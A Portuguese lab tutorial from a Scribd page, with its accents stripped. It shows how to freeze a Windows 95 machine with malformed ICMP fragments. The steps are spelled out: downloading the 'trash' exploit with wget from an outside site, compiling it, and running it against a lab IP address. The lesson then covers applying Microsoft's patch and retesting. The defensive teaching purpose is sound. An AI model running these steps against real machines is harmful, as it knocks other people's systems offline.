Scribd Logo
Upload

Welcome to Scribd!

  • HS04

    Uploaded by

    Bruno Marques
    5 views5 pages
    HS04

    Copyright

    © © All Rights Reserved

    Available Formats

    DOC, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    HS04

    Copyright:

    © All Rights Reserved
    Download as DOC, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    5 views5 pages

    HS04

    Uploaded by

    Bruno Marques
    HS04

    Copyright:

    © All Rights Reserved
    Download as DOC, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 5

    Aula 04 - Como os hackers conseguem congelar a

    maquina de um Internauta com Windows 95


    INTRODUO
    Mquinas com Windows 95 podem parar de responder (congelar) quando recebem um ataque de pacotes ICMP
    corrompidos. Este tipo de ataque ser demonstrado pelo exploit trash.

    PR-REQUISITOS:
    Para compilar o exploit necessrio corrigir os links quebrados do pacote kernel-headers do Conectiva Linux
    7.0:
    ln sf /usr/src/linux-2.4.5/include/linux/ /usr/include/linux
    ln sf /usr/src/linux-2.4.5/include/asm /usr/include/asm

    Depois obtenha o exploit trash.c:

    wget http://jeanchristian.com/exploits/trash.zip
    E prossiga descompactando-o:

    unzip trash.zip

    Protegendo o Windows 95 contra um ataque de congelamento de mquina


    Professor JeanChristian.com

    Na sequncia compile o exploit:

    gcc

    trash

    trash.c

    Supondo que o alvo do ataque seja uma estao Windows95 com IP 192.168.0.6, verifique se ela est visvel
    na rede:

    ping

    192.168.0.6

    c4

    Protegendo o Windows 95 contra um ataque de congelamento de mquina


    Professor JeanChristian.com

    Supondo que o IP da mquina de origem do ataque seja 192.168.0.17, o IP da mquina alvo seja 192.168.0.6,
    e o nmero de fragmentos de pacotes que sero enviados seja 300, ento, teste o ataque conforme a seguir:

    ./trash

    192.168.0.17

    192.168.0.6

    300

    Depois da execuo do ataque a mquina alvo ser travada (congelada). A nica forma de recupera-la
    atravs da sua reinicializao fsica (RESET).

    PROTEGENDO O WINDOWS 95 DE ATAQUES DE CONGELAMENTO


    Para proteger seu sistema Windows 95 de ataques de congelamento voc deve instalar o patch fornecido pela
    Microsoft Vipup11.exe:
    http://download.microsoft.com/download/win95upg/tcpip/1/WIN98/EN-US/vipup11.exe
    Depois do download, execute o programa VIPUP11.EXE e clique no boto Sim quando aparecer uma caixa
    de dilogo avisando que o programa ir atualizar o seu IP Driver:

    Protegendo o Windows 95 contra um ataque de congelamento de mquina


    Professor JeanChristian.com

    Quando a instalao do patch for concluda, aparecer a caixa de dilogo Update Complete:

    Reinicie o Windows para a atualizao fazer efeito:

    Protegendo o Windows 95 contra um ataque de congelamento de mquina


    Professor JeanChristian.com

    Depois, tente executar um novo ataque de congelamento contra a mquina protegida:

    ./trash

    192.168.0.17

    192.168.0.6

    300

    Observe na figura a seguir que o ataque no foi bem sucedido, pois, ainda possvel manter contato com a
    mquina alvo:

    ping 192.168.0.6

    c4

    You might also like